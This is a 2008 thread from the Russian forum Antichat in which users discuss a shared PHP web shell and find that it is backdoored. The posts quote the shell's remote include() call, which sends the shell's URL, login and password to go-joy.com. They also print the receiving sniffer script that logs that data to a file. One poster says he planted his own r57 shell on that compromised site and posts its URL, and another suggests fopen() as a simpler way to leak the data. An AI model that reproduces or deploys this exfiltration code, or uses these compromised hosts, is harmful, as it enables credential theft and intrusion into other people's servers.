ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
17.06.2008, 23:56
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
heks, это вполне логично. Антивирь не сравнивал процесс работы шеллов...
Он просто сравнил сигнатуры.
|
|
|
18.06.2008, 00:04
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
ну в этом я не силен
|
|
|
|
18.06.2008, 11:11
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
Сообщение от eNergy
а ты на другом сайте попробуй просто у тебя gzip не стоит
так у него там функции доса не так много
Причем здесь gzip?
PHP код:
function selfURL()
{
$s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : "";
$protocol = strleft(strtolower($_SERVER["SERVER_PROTOCOL"]), "/").$s;
$port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]);
return $protocol."://".$_SERVER['SERVER_NAME'].$port.$_SERVER['REQUEST_URI'];
}
$url=SelfURL();
include("http://www.go-joy.com/upload/temp/rcv.php?url=".$url."&login=".$login."&pass=".$pass);
скрипт сливает адрес шелла автору. И накой такой шелл нужен?!
|
|
|
|
18.06.2008, 12:00
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
в каком смысл сливает?
|
|
|
|
18.06.2008, 12:26
|
|
Banned
Регистрация: 10.06.2008
Сообщений: 278
Провел на форуме:
3119025
Репутация:
393
|
|
Сообщение от heks
в каком смысл сливает?
PHP код:
include("http://www.go-joy.com/upload/temp/rcv.php?url=".$url."&login=".$login."&pass=".$pass);
отправляет на www.go-joy.com логин и пасс от админки шелла ;/
|
|
|
|
18.06.2008, 13:01
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
Это - не шелл. Это - говно! А теперь по пунктам:
1. Он - говно.
2. Дизайн не его (изменены два-три цвета)
3. Движок не его (вообще ничего не изменено).
4. Он - говно
5. Он стучит о местоположение и аккаунте админа.
6. Аккаунт незашифрован.
7. Сниффер акков расположен на взломанном сайте (я туда, кстати, тоже шелл залил - http://www.go-joy.com/upload/temp/r57.php, поизучайте на  ).
8. Он - говно!
Содежржимое файла rcv.php (сниффера):
Код:
<? $file = fopen("here.txt","a"); $res=$_GET["url"]." ".$_GET["login"]." ".$_GET["pass"];
fputs($file,$res); fclose($file);?>
Содержимое here.txt:
Код:
http://microsoft.com/nowelnahuy.php fuckmoymosk vrotmnenogi../../
LoL! Кто-то прикололся)))
P.S. Я выкладываю УРЛ шелла ТОЛЬКО в целях показать сущность плагиатора для ТС и уважаемых Ачатовцев. Просьба не банить, не удалять, минусы не ставить.
P.P.S. Он - говно!!! |
|
|
|
18.06.2008, 19:41
|
|
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157
Репутация:
247
|
|
Содержимое here.txt:
Код:
http://microsoft.com/nowelnahuy.php fuckmoymosk vrotmnenogi../../
LoL! Кто-то прикололся))) Мой отжог
Мне ктото месагу там оставил вместо моего шелла.
В аську стукнул,
Жду ответа.
|
|
|
|
21.06.2008, 19:08
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
PHP код:
include("http://www.go-joy.com/upload/temp/rcv.php?url=".$url."&login=".$login."&pass=".$pass);
пипец какой извращенский способ сообщить данные хозяину -удаленный инклуд не всегда работает - да и тупо както...
Проще fopen() -ом было бы)) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
